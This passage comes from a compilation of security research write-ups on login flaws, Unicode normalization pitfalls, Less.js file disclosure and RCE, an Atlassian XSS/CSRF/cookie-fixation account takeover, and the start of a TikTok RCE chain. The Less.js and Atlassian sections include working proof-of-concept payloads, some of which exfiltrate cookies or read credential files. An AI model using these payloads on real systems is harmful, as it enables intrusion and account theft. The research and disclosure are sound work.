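print(single_valued("username=alice", "username"))  # alice

# A polluted request repeats the key and is rejected:
try:
    single_valued("username=alice&username=admin", "username")
except ValueError as err:
    print(err)
```

Frameworks differ on whether they take the first, last, or all values of a repeated parameter, which is exactly what makes the attack viable.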


Injection Attacks

This is one of the most common attacks that comes to mind when we talk about login functionality. Depending on the implementation of the login functionality, an attacker may attempt to bypass it by injecting SQL, NoSQL, LDAP or XML injection payloads and gain access to the victim’s account.


Remediation: To remediate this issue, the developers must ensure that the user-supplied input is validated correctly and security best practices for implementing database queries are followed. You can find a detailed guide at:
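As a sketch of that best practice, the following uses parameterized queries with Python's sqlite3 module (the table, columns and values are made up); the classic ' OR '1'='1 payload is bound as literal data and fails to authenticate:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'h4sh')")

def login(conn, username, password_hash):
    # Placeholders bind user input as data, never as SQL syntax.
    row = conn.execute(
        "SELECT 1 FROM users WHERE username = ? AND password_hash = ?",
        (username, password_hash),
    ).fetchone()
    return row is not None

print(login(conn, "alice", "h4sh"))                 # True
print(login(conn, "' OR '1'='1' --", "anything"))   # False: payload is inert
```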

Sensitive Information Disclosure

While performing a login action, it is often observed that some applications store the credentials in the response or in JavaScript files. An attacker may attempt to extract the credentials from the response or the JavaScript files. In some cases, the application may also expose additional information belonging to other users or to the application server itself, which can help further exploitation.


Remediation: To remediate this issue, the developers must ensure that the application doesn’t cache or store sensitive information such as credentials in an insecure place such as the server response or JavaScript files.

Response Manipulation

Often, the application returns “success”:false or “success”:true (or similar) depending on whether an invalid or valid set of credentials was supplied. If the application does not perform server-side validation properly, manipulating the response (for example, changing “success”:false to “success”:true) may allow an attacker to gain unauthorised access to the victim’s account. This attack mainly succeeds where the authentication token or cookie generation logic lies on the client side, which is a bad practice.

Similarly, in many scenarios the application uses different response status codes such as 403 and 200. Changing the status code from 403 to 200 may bypass the restriction and grant access to the victim’s account.

Remediation: To remediate this issue, the developers need to make sure that the server-side validation is in place and any attempts of client-side manipulation are discarded.

Authentication Bypass

In certain situations it is impossible to bypass the authentication directly, yet specific endpoints or pages can still be reached by navigating to them directly or in some other way. This allows an unauthenticated attacker to bypass the authentication requirement and access those functionalities.

For example: an unauthenticated attacker performs directory enumeration and identifies an endpoint /goto/administrator/ which is directly accessible without any restrictions.

Remediation: To remediate this issue, developers need to ensure that all authenticated endpoints are properly placed behind authentication and that a proper authorisation check is implemented.

Bonus: Cross-Site Request Forgery (with a twist)

Usually, most applications are vulnerable to login CSRF, but in general it has no security impact. That’s what you are thinking, right? However, when an application uses Single Sign-On, login CSRF comes in handy: it may allow an attacker to connect the victim user’s account to an attacker-controlled entity, which can further be used to steal sensitive information or perform malicious actions.

Example Report:

Remediation:  To remediate this issue, the developers must ensure that the state parameter is implemented and appropriately validated.

Apart from the vulnerabilities mentioned above, several others arise when third-party integrations such as SAML, OAuth 2.0 or other third-party services are used for authentication. These mechanisms are a vast topic in their own right to understand and explore. We will soon be coming up with a separate series on Single Sign-On (SSO) and JWT-related attack vectors.

Unicode for Security Professionals


Original text by Philippe Arteau

Unicode is the de-facto standard for multilingual character encoding. UTF-8 is the most popular encoding used that supports its hundreds of thousands of characters. Aside from the encoding (byte representation of characters), Unicode defines multiple transformations that can be applied to characters. For instance, it describes the behavior of transformations such as Uppercase.


The character known as Long S “ſ” (U+017F) will become a regular uppercase S “S” (U+0053). Unexpected behavior for developers can often lead to security issues. Today, we will dive into the case mapping and normalization transformations. You will see how they can contribute to logic flaws in code.

Along with this article, we are sharing a list of API to look for in source code audit. We are also publishing an interactive cheat sheet for character testing.

Unicode Transformations

Case Mapping

Unexpected behavior in transformations can sometimes lead to bugs, some of them affecting software security. While the strings “go\u017Fecure” and “gosecure” are not equal, code that applies the uppercase transformation to both strings could mistakenly interpret them as equal.

> "go\u017Fecure".toUpperCase().equals("gosecure".toUpperCase())
> true
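The same collision reproduces in Python, where the long s also uppercases to a plain ASCII S:

```python
a = "go\u017Fecure"  # contains the long s "ſ" (U+017F)
b = "gosecure"

print(a == b)                  # False: the raw strings differ
print(a.upper() == b.upper())  # True: both uppercase to "GOSECURE"
```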


Aside from the uppercasing and lowercasing, there is normalization which is also specified by Unicode. The purpose of normalization is to simplify expressions to allow matching equal or equivalent “meaning”. The comparison could be useful when implementing a search or a sort feature for example.

For simplification, we will group the forms NFC and NFD (Normalization Form Canonical Composition/Decomposition) together and do the same with NFKC and NFKD (Normalization Form Compatibility Composition/Decomposition). While their behaviors are not identical in general, they are identical for the characters that interest us.


NFC/NFD is the most common form of normalization. You are likely to see it used internally in some of the functions in your favorite language. It is much stricter compared to NFKC/NFKD. There are only three characters that will normalize to ASCII characters.

  Original Character  Normalized Character
  ; (U+037E)  ; (U+003B)
  ` (U+1FEF)  ` (U+0060)
  K (U+212A)  K (U+004B)
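These three mappings can be checked directly with Python's unicodedata module:

```python
import unicodedata

# The only characters whose NFC normalization yields ASCII:
print(unicodedata.normalize("NFC", "\u037E"))  # ; (U+003B)
print(unicodedata.normalize("NFC", "\u1FEF"))  # ` (U+0060)
print(unicodedata.normalize("NFC", "\u212A"))  # K (U+004B)
```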


On the other hand, NFKC is a looser method of representing the equivalence of characters. It will decompose a symbol that contains multiples letters. It will also simplify exponents and stylized characters. With this normalization form, 610 characters will produce ASCII characters. Here are a few examples.

  Original Character  Transformed Character
  ª (U+00AA)  a (U+0061)
  ℋ (U+210B)  H (U+0048)
  Ⓐ (U+24B6)  A (U+0041)
  ㍲ (U+3372)  da (U+0064 U+0061)
  ﹤ (U+FE64)  < (U+003C)
  … and more  …
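The looser NFKC mappings from the table above can be verified the same way:

```python
import unicodedata

print(unicodedata.normalize("NFKC", "\u00AA"))  # a
print(unicodedata.normalize("NFKC", "\u210B"))  # H
print(unicodedata.normalize("NFKC", "\u24B6"))  # A
print(unicodedata.normalize("NFKC", "\u3372"))  # da
print(unicodedata.normalize("NFKC", "\uFE64"))  # <
```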

What does vulnerable code look like? Security bugs revolve around logic flaws: conditions that should not be satisfiable become so thanks to permissive Unicode comparisons. An example of such a logic flaw is the one that affected Django and GitHub: password reset based on email submission.

Here is an example of faulty logic. In this password reset form from Django, an email value is received, the user information is fetched, and an email is sent to each user that matched. The issue is that the search is case-insensitive, so a special Unicode character can be used to trigger a collision. Such characters may then be converted to Punycode when the email is sent to the SMTP service.

class PasswordResetForm(forms.Form):
    def save(self, [...]):
        # Email from user input
        email = self.cleaned_data["email"]
        # [...]
        # Search for an email - Case _insensitive_
        for user in self.get_users(email):
            # Send an email with the original email

Source: [django/contrib/auth/]

This code was fixed by using the email address already stored in the database, so the reset email is only ever sent to the original address registered by the user.
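A minimal Python reproduction of the collision (the addresses are made up): the dotless ı (U+0131) uppercases to an ASCII I, so a case-insensitive email lookup matches both strings:

```python
real  = "mike@example.org"
spoof = "m\u0131ke@example.org"  # dotless i (U+0131) instead of "i"

print(real == spoof)                  # False: distinct addresses
print(real.upper() == spoof.upper())  # True: both become MIKE@EXAMPLE.ORG
```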

Differences in programming languages

Transformations are expected to be standardized [1] [2]. We compared the implementations in various languages. The normalization transformations NFC, NFD, NFKC and NFKD were identical; however, the case mappings had some small differences.

Unicode characters producing ASCII character with lowercase transformation

  Character  Result  Python  Ruby  Java  C#  Go  PHP  PHP (mb_*)
  İ (U+0130)  i̇ (U+0069 U+0307)  x  x  x  x      x
  K (U+212A)  k (U+006B)  x  x  x  x      x

Unicode characters producing ASCII character with uppercase transformation

  Character  Result  Python  Ruby  Java  C#  Go  PHP  PHP (mb_*)
  ß (U+00DF)  SS  x  x  x  **      x
  ı (U+0131)  I  x  x  x  x  x    x
  ʼn (U+0149)  ʼN  x  x  x        x
  ſ (U+017F)  S  x  x  x  x  x    x
  ǰ (U+01F0)  J̌  x  x  x        x
  ẖ (U+1E96)  H̱  x  x  x        x
  ẗ (U+1E97)  T̈  x  x  x        x
  ẘ (U+1E98)  W̊  x  x  x        x
  ẙ (U+1E99)  Y̊  x  x  x        x
  ẚ (U+1E9A)  Aʾ  x  x  x        x
  ff (U+FB00)  FF  x  x  x        x
  fi (U+FB01)  FI  x  x  x        x
  fl (U+FB02)  FL  x  x  x        x
  ffi (U+FB03)  FFI  x  x  x        x
  ffl (U+FB04)  FFL  x  x  x        x
  ſt (U+FB05)  ST  x  x  x        x
  st (U+FB06)  ST  x  x  x        x

There are four main observations to extract from the previous grid.

The first is that PHP’s strtolower() and strtoupper() have no potential side effects: they only transform ASCII characters. When a PHP developer introduces Unicode lowercasing, it is done willingly using the multibyte function mb_strtolower(). PHP used to provide aliasing (overloading) of those functions to their multibyte versions, which is likely to introduce unexpected behaviors because the original code might not have been built with Unicode support in mind.

The second highlight is that both C# and Go only support two characters for uppercasing. In terms of internationalization, it represents an incomplete case mapping implementation. But in terms of security, this further reduces the size of the already limited character set available to perform these attacks.

** The third observation is that the German ß (Eszett) in C# is not transformed by the ToUpper() function. It is, however, supported in APIs such as string.Equals(input1, input2, StringComparison.CurrentCultureIgnoreCase).

Finally, some Unicode characters transform into multiple characters of which only part are ASCII. This has limited risk, but the output value may later be transformed again to keep only the ASCII characters. For example, the following Python snippet illustrates a second operation where the non-ASCII characters are truncated during string decoding.

>>> # First, the string is transformed using uppercasing
>>> input = "\u0149orthsec".upper()               # ʼNORTHSEC
>>> # Later, the string is reimported...
>>> encoded_bytes = bytes(input, "utf-8")         # \xca\xbcNORTHSEC
>>> encoded_bytes.decode("ascii", errors='ignore') # NORTHSEC

Transformations are not limited to the uppercase and lowercase as you will see in the next section.

Auditing Source Code

If you are reviewing code from applications, you may be wondering which API (functions) should be reviewed. We have compiled a list below of Unicode case mapping and normalization functions. We have also included less obvious functions that under the hood applied these transformations. Standard libraries include many of those hidden transformations. We have included only those that are likely to be used when implementing security controls.

C# (.NET)

  Case mapping  Normalization  Other
Regex.IsMatch(input, regex,RegexOptions.IgnoreCase);
string.Equals(input1, input2,StringComparison.CurrentCultureIgnoreCase);
Uri(input).Host
Uri(input).IdnHost

Aside from the obvious functions, regex evaluation with the IgnoreCase option supports Unicode transformations. A developer should not assume that only ASCII characters can match; however, values extracted from regex groups will not be converted implicitly.

Regex.IsMatch("hac\u212A", "HACK", RegexOptions.IgnoreCase) == true

The Uri class implicitly lowercases the hostname when the class is initialized. This would only be a security issue if the hostname is validated before with a different parser.

new Uri("http://faceboo\u212A.com").Host == "facebook.com"


Go
  Case mapping  Normalization  Other

Go has a small number of functions to look for. One interesting aspect is that byte arrays can be lowercased and uppercased. The language assumes that byte arrays are UTF-8 encoded.


Java
  Case mapping  Normalization  Other

new URI(input).toASCIIString()

URIs are not transformed by default in Java. Calling toASCIIString() will normalize characters to the canonical form (NFC). The StreamSource and SAXParser classes, used for parsing large XML files, normalize the URIs and file names they receive. Normalization is likely to open a small opportunity for path traversal in the context of blacklisted routes: “/BACKUP/” could possibly be reached with “BAC\u212AUP”. The behavior occurs when using a File as argument; the String and InputSource arguments do not have this side effect.
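The same effect is easy to reproduce in Python (the path is illustrative): a blacklist check on the raw path misses the Kelvin sign, but matches once the path is NFC-normalized downstream:

```python
import unicodedata

path = "/BAC\u212AUP/secret.txt"  # Kelvin sign (U+212A) instead of "K"

print("/BACKUP/" in path)                                # False: blacklist misses it
print("/BACKUP/" in unicodedata.normalize("NFC", path))  # True: normalized path matches
```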


Python
  Case mapping  Normalization  Other
input.upper()
re.compile(regex, re.IGNORECASE).match(input)
unicodedata.normalize('NFC', input)
unicodedata.normalize('NFKC', input)

Just like in C#, parsing a URL can lead to an implicit lowercasing of the hostname.

>>> import urllib.parse
>>> urllib.parse.urlparse("http://i\u212A.com").hostname == "ik.com"
True


Ruby
  Case mapping  Normalization  Other

We did not find any special APIs. The URI class lowercases the hostname internally; however, an exception is raised if any non-ASCII characters are specified, so the URI class has no chance of causing harm.

Cataloging the Characters

Characters that can be transformed into ASCII characters are the most interesting for security professionals, as they are likely to be confused with the intended character. The previous code snippets showed some examples that could be abused in faulty logic.

To help both developers and pentesters, we have built an interactive cheat sheet. This cheat sheet can be used by developers to build regression test cases to make sure no characters are being misinterpreted. For pentesters, the list can help build payloads in the context of black-box testing. For each interesting Unicode character, we have listed the most common encodings to facilitate integration into JSON, HTTP GET parameters, and XML payloads.

Interactive Cheat Sheet



Although security problems emerging from these transformations are rare, we hope this article helps when performing code review of security-critical components that use them. By providing an exhaustive list of characters, we hope developers can easily get good coverage of potential glitches in manual dynamic tests or automated regression tests.

This article does not cover any specific vulnerabilities and is meant as a reference. However, we are going to release a follow-up blog post with specific vulnerabilities in popular software products such as the Oracle JDK and Apache’s HTTPClient library. Do not miss this!



Original text by Jeremy Buis


Less (less.js) is a preprocessor language that transpiles to valid CSS code. It offers functionality to help ease the writing of CSS for websites. 

According to the State of CSS 2020 survey, Less.js was the second most popular preprocessor in terms of usage.

Less.js popularity sorted by usage in the 2020 State of CSS survey

While performing a pentest for one of our Penetration Testing as a Service (PTaaS) clients, we found an application feature that enabled users to create visualizations which allowed custom styling. One of the visualizations allowed users to input valid Less code, which was transpiled on the client-side to CSS. 

This looked like a place that needed a closer look. 

Less has some interesting features, especially from a security perspective. Less before version 3.0.0 allows the inclusion of JavaScript by default with the use of the backtick operators. The following is considered valid Less code:

@bodyColor: `red`;
body {
  color: @bodyColor;
}


Which will output:

body {
  color: red;
}


Inline JavaScript evaluation was documented back in 2014 and can be seen here near the header “JavaScript Evaluation”.

JavaScript Evaluation

Standing on the shoulders of giants

RedTeam Pentesting documented the inline JavaScript backtick behaviour as a security risk in an advisory that was released in 2016.  They warned that it could lead to RCE in certain circumstances. The following is a working proof-of-concept from their excellent blog post:

$ cat cmd.less
@cmd: `global.process.mainModule.require("child_process").execSync("id")`;
.redteam { cmd: "@{cmd}" }


As a result, Less versions 3.0.0 and newer disallow inline JavaScript via backticks by default; it can be re-enabled via the option {javascriptEnabled: true}.

Next, we return to our PTaaS client test, where the Less version was pre-3.0.0 and transpiled on the client side, allowing inline JavaScript execution by default. This resulted in a nice DOM-based stored cross-site scripting vulnerability with a payload like the following:

body {
color: `alert('xss')`;
}


The above pops an alert confirming the XSS payload fired once the Less code is transpiled.

This was a great find for our client, but wasn’t enough to scratch our itch. We started probing the rest of the available features to see if there was any other dangerous behaviour that could be exploited.

The bugs

Import (inline) Syntax

The first bug is a result of the enhanced import feature of Less.js, which contains an inline mode that doesn’t interpret the requested content. This can be used to request local or remote text content and return it in the resulting CSS. 

In addition, the Less processor accepts URLs and local file references in its @import statements without restriction. This can be used for SSRF and local file disclosure when the Less code is processed on the server-side. The following steps first demonstrate a potential local file disclosure followed by a SSRF vulnerability.

Local file disclosure PoC

1. Create a Less file like the following:

// File: bad.less
@import (inline) "../../.aws/credentials"; 


2. Launch the lessc command against your less file

Less $ lessc bad.less


3. Notice the output contains the referenced file

Lessjs $ .\node_modules\.bin\lessc .\bad.less



SSRF PoC
1. Start a web server on localhost serving a Hello World message

2. Create a Less file like the following:

// File: bad.less
@import (inline) "http://localhost/"; 

3. Launch the lessc command against your Less file and notice the output contains the referenced external content

Lessjs $ .\node_modules\.bin\lessc .\bad.less
Hello World



Plugins
The Less.js library supports plugins which can be included directly in the Less code from a remote source using the @plugin syntax. Plugins are written in JavaScript and when the Less code is interpreted, any included plugins will execute. This can lead to two outcomes depending on the context of the Less processor. If the Less code is processed on the client side, it leads to cross-site scripting. If the Less code is processed on the server-side, it leads to remote code execution. All versions of Less that support the @plugin syntax are vulnerable.

The following two snippets show example Less.js plugins.

Version 2:

// plugin-2.7.js
functions.add('cmd', function(val) {
  return val;
});


Version 3 and up:

// plugin-3.11.js
module.exports = {
  install: function(less, pluginManager, functions) {
    functions.add('ident', function(val) {
      return val;
    });
  }
};


Both of these can be included in the Less code in the following way and can even be fetched from a remote host:

// example local plugin usage
@plugin "plugin-2.7.js";



// example remote plugin usage
@plugin ""


The following example snippet shows how an XSS attack could be carried out:

functions.add('cmd', function(val) {
  return val;
});


Plugins become even more severe when the code is transpiled on the server side. The next examples target version 2.7.3.

The following plugin snippet (v2.7.3) shows how an attacker might achieve remote code execution (RCE):

functions.add('cmd', function(val) {
  return `"${global.process.mainModule.require('child_process').execSync(val.value)}"`;
});


And the malicious less that includes the plugin:

@plugin "plugin.js";

body {
color: cmd('whoami');
}

Notice the output when the Less code is transpiled using lessc.

Lessjs Local RCE

The following is the equivalent PoC plugin for version 3.13.1:

// Vulnerable plugin (3.13.1)
module.exports = {
    install: function(less, pluginManager, functions) {
        functions.add('cmd', function(val) {
            return global.process.mainModule.require('child_process').execSync(val.value).toString();
        });
    }
};


The malicious Less code is the same for all versions. All versions of Less.js that support plugins can be exploited using one of the PoCs above.

Real-world example: a popular website for creating web code snippets supports the standard languages plus others like Less.js. Since the site accepts security issues from the community, we tried our proof of concepts against it to check the results of our research.

As a result, we found that it was possible to perform the above attack using plugins against their website. We were able to leak their AWS secret keys and run arbitrary commands inside their AWS Lambdas.

The following shows reading environment values using the local file inclusion bug.

// import local file PoC
@import (inline) "/etc/passwd";


ec2-user:x:1000:1000:EC2 Default User:/home/ec2-user:/bin/bash
rngd:x:996:994:Random Number Generator Daemon:/var/lib/rngd:/sbin/nologin


The next screenshot shows using the Less plugin feature to gain RCE.

Less RCE PoC in action

We responsibly disclosed the issue, and it was quickly fixed.


  2. Less.js: Compilation of Untrusted LESS Files May Lead to Code Execution through the JavaScript Less Compiler
  3. Executing JavaScript In The LESS CSS Precompiler
  4. Features In-Depth | Less.js

A supply-chain breach: Taking over an Atlassian account


Original text by Dikla Barda, Yaara Shriki, Roman Zaikin and Oded Vanunu


With more than 180,000 customers globally and millions of users, Atlassian, an Australian company founded in 2002, develops products for software developers, project managers and other software teams who use the platform for data collaboration and information sharing.

While workforces globally turned to remote work as a result of the outbreak of COVID-19, tools such as the ones offered by Atlassian became more popular and critical for teams while the need for a seamless transition to a new work mode became a global necessity.

Atlassian, referring to this as “The Rise of Work Anywhere”, conducted a research about the nature of remote work during the Pandemic. The study surveyed more than 5,000 participants in Australia, France, Germany, Japan, and the US, and shows how the nuances of modern work have been amplified, demanding a shift in the way organizations manage an increasingly distributed workforce.

Breaking on through the Platform

On November 16, 2020, Check Point Research (CPR) uncovered chained vulnerabilities that together can be used to take over an account and control some Atlassian apps connected through SSO. Some of the affected domains are:


What makes a supply-chain attack such as this one so significant is that once the attacker leverages these vulnerabilities and takes over an account, he can plant backdoors for use in future attacks. This can cause severe damage that will only be identified and contained long after it is done.

Check Point Research responsibly disclosed this information to the Atlassian teams, and a solution was deployed to ensure its users can safely continue to share information on the various platforms.

Deep Dive

Atlassian uses SSO (Single Sign-On) to navigate between Atlassian products such as JIRA, Confluence and Partners.

Atlassian implements various web security measures such as CSP, SameSite “Strict” cookies and HttpOnly cookies. We had to bypass these protections using a combination of several attack techniques; overall, we were able to achieve a full account takeover.

First, we had to find a way to inject code into Atlassian, for which we used the XSS and CSRF bugs. Then, using this code injection, we were able to add a new session cookie to the user’s account and, by combining it with the session fixation vulnerability in Atlassian domains, take over accounts.

Let us dive into the first bug we found:


The first security issue was found on the subdomain training.atlassian.com. The Training platform offers users courses or credits.
We noticed that the Content Security Policy (CSP) was configured poorly on this subdomain, with ‘unsafe-inline’ and ‘unsafe-eval’ directives that allow script execution. This makes this subdomain a perfect starting point for our research.

We examined the request parameters when adding courses and credits to the shopping cart. We found that when the item type is “training_credit”, an additional parameter called “options._training_credit_account” is added to the request. This parameter was found to be vulnerable to XSS.

Let’s test a simple payload to receive all of the user’s cookies and local storage:


It works!

And we received all the cookies and the local storage of the target:


Since the stored XSS only runs when adding items to the shopping cart, we needed to make the user add a malicious item without their notice. Because there is no CSRF token, we could perform a CSRF attack on the shopping list and execute our payload.

In order to achieve that, we uploaded the following POC to our servers and sent it to the victim:



<html>
  <body onload="document.forms[0].submit()">
    <form method="post" action="">
      <input type="hidden" name="itemType" value='training_credit'>
      <input type="hidden" name="itemId" value='1'>
      <input type="hidden" name="options._quantity" value='10'>
      <input type="hidden" name="options._training_credit_account" value='"><svg/onload="window.location.href=`//${JSON.stringify(localStorage)}&c=${document.cookie}`">'>
      <input type="hidden" name="action" value='add'>
    </form>
  </body>
</html>




However, some of the cookies related to the victim’s session are set to SameSite “Strict”, which means the browser prevents them from being sent to the backend.

Surprisingly, we found that during the SSO process those missing cookies are completed by the backend, which essentially bypasses SameSite “Strict” for us.

SameSite “Strict” Bypass

We will now describe the SSO flow. We start with the XSS payload from our origin

During the SSO flow, the user gets redirected several times to different paths, such as /auth/cart, login.html, etc. Throughout the redirect process, the user goes through authentication, which adds the missing cookies that we needed and that were protected by SameSite.
Because our payload was stored XSS, it was saved in the database and added to the shopping list. Here we can see that the payload was injected successfully into the page:

And the malicious item was added to the shopping cart:

At this step we bypassed SameSite “Strict” for CSRF and CSP with inline JavaScript.

However, the more interesting cookie is JSESSIONID, which is protected by “HttpOnly”, so we can’t hijack it via JavaScript.

At this point we could perform actions on behalf of the user but not log in to his account, so we dove further into the SSO flow to find another flaw in the process.

HTTPOnly Bypass and Cookie Fixation

What is cookie fixation?

Cookie fixation is when an attacker can remotely force the user to use a session cookie known to the attacker, which then becomes authenticated.

Initially, when the user browses to the login page, the server generates a new session cookie with the ‘path=/’ flag. That cookie isn’t associated with any account; only after the user passes the authentication process will that same cookie be associated with his account.

We knew that using the XSS we couldn’t get the user’s session cookie, since it was protected by the HttpOnly flag. Instead, we could create a new forged one. The newly created JSESSIONID cookie has the same flags as the original, with one major change: the path flag.

The original path flag is set to the root directory. We wondered what would happen if we changed it to a more particular path. It turns out that our path takes priority, since it is more specific, and is used instead of the original.

We changed the path to the exact directive we know the user will get redirected to after authentication which causes the backend to authorize our cookie over the original one.

By using cookie fixation, we bypassed the HTTPOnly and hijacked the user’s Atlassian account. We will demonstrate that on the following subdomains:

We started by navigating to the URL from a clean browser without any cache to get a new clean JSESSIONID cookie.

Now, we have a JSESSIONID without any information in it at the backend. If we send a request to the user profile page, we will be redirected to the login page.

We will now perform cookie fixation on the target, forcing him to use the forged cookie, through the following steps:

We start by modifying our payload and adding the following cookie:

document.cookie = "JSESSIONID=5B09C73BF13FE923A2E5B4EE0DAD30E3; Domain=training.atlassian.com; Path=/auth0; Secure"

Note that the original HttpOnly cookie was set for the path “/”, but the new cookie we are setting in the payload is for the path “/auth0”. Browsing to /auth0, there are 2 cookies: the real one and ours. Ours will “win” in this case because it’s more specific.

We will use the following redirect to trigger the authentication with this cookie instead of the real one. The interesting parameter here is “redirect_uri=”, which will force the authentication for https://training.atlassian.com/auth0.


This auth request will associate our cookie to the target account.

So now that we can control the JSESSIONID, we combined all of these steps and crafted the following payload:



<html>
  <body onload="document.forms[0].submit()">
    <form method="post" action="">
      <input type="hidden" name="itemType" value='training_credit'>
      <input type="hidden" name="itemId" value='1'>
      <input type="hidden" name="options._quantity" value='10'>
      <input type="hidden" name="options._training_credit_account" value='"><svg/onload="eval(atob`ZG9jdW1lbnQuY29va2llPSJKU0VTU0lPTklEPTVCMDlDNzNCRjEzRkU5MjNBMkU1QjRFRTBEQUQzMEUzOyBEb21haW49dHJhaW5pbmcuYXRsYXNzaWFuLmNvbTsgUGF0aD0vYXV0aDA7IFNlY3VyZSI7IHNldFRpbWVvdXQoZnVuY3Rpb24oKXsgbG9jYXRpb24uaHJlZj0iaHR0cHM6Ly9hdGxhc3NpYW51bmktbGVhcm5kb3QuYXV0aDAuY29tL2F1dGhvcml6ZT9yZWRpcmVjdF91cmk9aHR0cHM6Ly90cmFpbmluZy5hdGxhc3NpYW4uY29tL2F1dGgwJmNsaWVudF9pZD1PN0ZkSFk2NDdWdmJDVHBoQkdtdmZCdDJHZGduSDdNUiZhdWRpZW5jZT1odHRwcyUzQSUyRiUyRmF0bGFzc2lhbnVuaS1sZWFybmRvdC5hdXRoMC5jb20lMkZ1c2VyaW5mbyZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwZW1haWwmcmVzcG9uc2VfdHlwZT1jb2RlJnN0YXRlPUh4RWxwUHlTc3JSdUtjWWJGT2xwOVFrTFpRN2t3RE9lbVg3RGMtNWRubGsiIH0sMzAwMCk7`)">'>
      <input type="hidden" name="action" value='add'>
    </form>
  </body>
</html>





// Payload explained

btoa('document.cookie="JSESSIONID=5B09C73BF13FE923A2E5B4EE0DAD30E3; Path=/auth0; Secure"; setTimeout(function(){ location.href="" },3000);');


The Cookie Fixation combined with the XSS and CSRF bugs allowed us to perform full Account Take-Over on Atlassian Training Platform.

With the same flow and Cookie Fixation we can navigate to other Atlassian products, for example,

To hijack Jira accounts with the same flow, we first need to create a session cookie to perform Cookie Fixation. We log in to and take the following cookies:


In order to use these cookies for the Cookie Fixation, the attacker needs to sign out from his account to get a clean JSESSIONID. We can verify that the cookie is no longer associated with any account by sending a request to ViewProfile:

Next, we will modify our payload, performing the same method as we did in

document.cookie="JSESSIONID=1672885C3F5E4819DD4EF0BF749E56C9; Path=/plugins; Secure;"

document.cookie="AWSALB=iAv6VKT5tbu/HFJVuu/dTE7R80wQXNjR+0opVbccE0zIadORJVGMZxCUcTIglL3OZ/A54eu/NDNLP5I3zE+WcgGWDHpv17SexjFBc1WYA9moC4wEmPooEE/Uqoo2; Path=/plugins/; Secure;"

Note that the original HttpOnly cookie was set for the path "/", but the new cookie we are setting is for the path "/plugins". Browsing to /plugins, there are 2 cookies: the real one and ours. Ours will "win" in this case because it's more specific.

We will use the following redirect to trigger the Auth with this cookie instead of the real one. The interesting parameter here is "redirect_uri=", which will force the authentication for and redirect us to /plugins.

location.href=""

This auth request will associate our cookie to the target account.

As can be seen in the following request, the cookie is now associated to the target user ("John Doe" in this case).

So now that we can control the JSESSIONID, we combined all of these steps and crafted the following payload:



<body onload="document.forms[0].submit()">
<form method="post" action="">
<input type="hidden" name="itemType" value='training_credit'>
<input type="hidden" name="itemId" value='1'>
<input type="hidden" name="options._quantity" value='10'>
<input type="hidden" name="options._training_credit_account" value='"><svg/onload="eval(atob`ZG9jdW1lbnQuY29va2llPSJKU0VTU0lPTklEPTE2NzI4ODVDM0Y1RTQ4MTlERDRFRjBCRjc0OUU1NkM5OyBEb21haW49LmF0bGFzc2lhbi5jb207IFBhdGg9L3BsdWdpbnM7IFNlY3VyZTsiOyAgZG9jdW1lbnQuY29va2llPSJBV1NBTEI9aUF2NlZLVDV0YnUvSEZKVnV1L2RURTdSODB3UVhOalIrMG9wVmJjY0UweklhZE9SSlZHTVp4Q1VjVElnbEwzT1ovQTU0ZXUvTkROTFA1STN6RStXY2dHV0RIcHYxN1NleGpGQmMxV1lBOW1vQzR3RW1Qb29FRS9VcW9vMjsgRG9tYWluPS5hdGxhc3NpYW4uY29tOyBQYXRoPS9wbHVnaW5zLzsgU2VjdXJlOyI7ICBzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7IGxvY2F0aW9uLmhyZWY9Imh0dHBzOi8vYXV0aC5hdGxhc3NpYW4uY29tL2F1dGhvcml6ZT9yZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZqaXJhLmF0bGFzc2lhbi5jb20lMkZwbHVnaW5zJTJGc2VydmxldCUyRmF1dGhlbnRpY2F0aW9uJTNGYXV0aF9wbHVnaW5fb3JpZ2luYWxfdXJsJTNEaHR0cHMlMjUzQSUyNTJGJTI1MkZqaXJhLmF0bGFzc2lhbi5jb20lMjUyRiZjbGllbnRfaWQ9UXhVVmg5dFR1Z29MQzVjZ1kzVmprejNoMWpQU3ZHOXAmc2NvcGU9b3BlbmlkK2VtYWlsK3Byb2ZpbGUmc3RhdGU9NDExOGY1N2YtYTlkOS00ZjZkLWExZDUtYWRkOTM5NzYyZjIzJnJlc3BvbnNlX3R5cGU9Y29kZSZwcm9tcHQ9bm9uZSIgfSwzMDAwKTs=`);">'>
<input type="hidden" name="action" value='add'>
</form>
</body>





// Payload

document.cookie="JSESSIONID=1672885C3F5E4819DD4EF0BF749E56C9; Path=/plugins; Secure;";

document.cookie="AWSALB=iAv6VKT5tbu/HFJVuu/dTE7R80wQXNjR+0opVbccE0zIadORJVGMZxCUcTIglL3OZ/A54eu/NDNLP5I3zE+WcgGWDHpv17SexjFBc1WYA9moC4wEmPooEE/Uqoo2; Path=/plugins/; Secure;";






The Cookie Fixation combined with the XSS and CSRF bugs allowed us to perform full Account Take-Over on


Another direction we looked into was checking if we could inject malicious code to an Organization’s Bitbucket. Bitbucket is a Git-based source code repository hosting service owned by Atlassian and has more than 10 million users. Accessing a company’s Bitbucket repositories could allow attackers to access and change source code, make it public or even plant backdoors.

With a Jira account in our hands, we have a few ways to obtain a Bitbucket account. One option is opening a Jira ticket with a malicious link to an attacker-controlled website.

An automatic mail will be sent from an Atlassian domain to the user once the ticket is created in Jira. An attacker can take advantage of that and include in the ticket a link to a malicious website that steals the user's credentials.


By using the XSS with CSRF that we found on combined with the method of Cookie Fixation, we were able to take over any Atlassian account, in just one click, on every subdomain under that doesn't use JWT for the session and that is vulnerable to session fixation. For example:,, and more.

Taking over an account in such a collaborative platform means an ability to take over data that is not meant for unauthorized view.

Check Point Research responsibly disclosed this information to the Atlassian teams, and a solution was deployed to ensure its users can safely continue to share info on the various platforms.

POC Video:

TikTok for Android 1-Click RCE

TikTok for Android 1-Click RCE

Original text by Sayed Abdelhafiz


While testing the TikTok for Android application, I identified multiple bugs that can be chained to achieve remote code execution, reachable through multiple dangerous attack vectors. In this write-up, we will discuss every bug and the chain altogether. I worked on it for about 21 days, a long time, yet the final exploit was simple. The long time I spent on this exploit gave me incredible experience and an important trick that helped me a lot. TikTok implemented a fix to address the bugs identified, and it was retested to confirm the resolution.


  1. Universal XSS on TikTok WebView
  2. Another XSS on AddWikiActivity
  3. Start Arbitrary Components
  4. Zip Slip in TmaTestActivity
  5. RCE!

